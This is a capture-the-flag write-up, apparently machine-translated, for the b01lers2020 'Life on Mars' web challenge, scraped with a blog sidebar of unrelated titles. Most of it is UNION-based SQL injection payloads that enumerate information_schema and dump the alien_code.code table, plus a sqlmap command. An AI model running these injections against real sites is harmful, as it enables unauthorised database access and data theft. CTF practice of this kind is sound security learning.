当前位置:网站首页>[b01lers2020]Life on Mars
[b01lers2020]Life on Mars
2022-08-03 22:03:00 【New Reading of the Classic of Tea.】
[b01lers2020]Life on Mars

A general look at the points is not important, f12 found nothing, and the packet capture found GET /query?search=&amazonis_planitia&{}&_=1659321817406
strong>, click on different titles, the content of amazonis_planitia will also change with it

Attempt to enter the page it appears on this page
![]()

Find a lot of data, try union query: /query?search=amazonis_planitia union select 1,2, find that there areecho

Check the library: /query?search=amazonis_planitia union select version(),database()

Check the table: /query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

After checking, I found that the echoed things are the titles of the first page, query the fields of the table: /query?search=amazonis_planitia union select1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia', nothing special 
Use the sqlmap tool to scan it
sqlmap download: sqlmap: automatic SQL injection and database takeover tool
python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs

I found that there are three databases in the modified webpage, and you can check it yourself: /query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA, there are indeed three databases

I have already queried aliens and found nothing, continue to query the table of alien_code: /query?search=amazonis_planitia union select 1,group_concat(table_name)from information_schema.tables where table_schema='alien_code'

Query the fields of the code table: /query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'

Check the content: /query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code

This is the end, let's spread the flowers
边栏推荐
- CAS:153162-70-0_N-BOC-6-Biotinamidohexylamine
- 384. Shuffle an Array
- shell编程基础
- C. Fishingprince Plays With Array--Codeforces Global Round 21
- XSS online shooting range---prompt
- 线程池的高级应用技巧核心解读
- 488. Zuma Game
- 东西向和南北向通信的统一
- CAS: 773888-45-2_BIOTIN ALKYNE_生物素-炔基
- C. Array Elimination-- Codeforces Round #751 (Div. 2)
猜你喜欢

基于支持向量机的网络⼊侵检测系统的全面调查和分类

XSS练习---一次循环和两次循环问题

《强化学习周刊》第56期:GraphIRL、REDEEMER & 眼科强化学习的潜在研究

剑指 Offer 16. 数值的整数次方
![[kali-vulnerability scanning] (2.1) Nessus download and installation (on)](/img/72/d3e46a820796a48b458cd2d0a18f8f.png)
[kali-vulnerability scanning] (2.1) Nessus download and installation (on)

【刷题篇】二叉树的右视图
![[b01lers2020]Life on Mars](/img/d0/d5c9b7224542c8843ce29adc7ef713.png)
[b01lers2020]Life on Mars

Data_web(九)mongodb增量同步到mongodb

CAS:122567-66-2_DSPE-Biotin_DSPE-Biotin

CAS:1620523-64-9_Azide-SS-biotin_生物素-二硫-叠氮
随机推荐
CAS:122567-66-2_DSPE-Biotin_DSPE-Biotin
2022的七夕,奉上7个精美的表白代码,同时教大家快速改源码自用
D - Project Planning--二分
嵌入式开发:嵌入式基础——代码和数据空间揭秘
XSS online shooting range---haozi
这几个常用 alias,带你高效做事(下)
[b01lers2020]Life on Mars
Cross-end development technical reserve record
线程池的高级应用技巧核心解读
dataframe multi-level index replace index df.swaplevel(axis=1)
CAS: 1192802-98-4 _uv cracking of biotin - PEG2 - azide
关于Yii2批量更新的操作
数据一致性:双删为什么要延时?
聚焦开源与联合共创|麒麟软件出席开源峰会欧拉分论坛
模板字符串
主板设计中:网络变压器与RJ45网口之间应该保持什么样的距离?
CAS:1797415-74-7_TAMRA-Azide-PEG-Biotin
XSS漏洞复现
376. Wiggle Subsequence
Flink--Join以及Flink函数